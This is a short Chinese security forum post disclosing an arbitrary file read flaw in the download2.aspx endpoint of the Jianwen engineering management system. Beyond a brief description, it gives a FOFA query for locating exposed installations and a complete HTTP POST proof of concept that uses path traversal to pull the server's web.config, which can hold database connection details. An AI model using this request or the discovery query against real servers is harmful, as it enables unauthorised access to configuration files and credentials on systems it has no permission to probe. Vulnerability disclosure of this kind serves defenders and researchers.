建文工程管理系统download2.aspx接口处存在任意文件读取漏洞-网络安全论坛-网络安全-阻击者联盟

建文工程管理系统download2.aspx接口处存在任意文件读取漏洞

漏洞描述

攻击者可通过构造特定的HTTP请求,利用download2.aspx接口对文件路径的校验不足,突破目录限制,读取服务器上的任意文件,包括系统配置文件、数据库连接信息、源代码等敏感数据。

资产信息

fofa:body="Login/QRLogin.ashx"

d2b5ca33bd20251226182530

d2b5ca33bd20251226182536

POC

POST /Common/DownLoad2.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded

path=../web.config&Name=

 

请登录后发表评论

    没有回复内容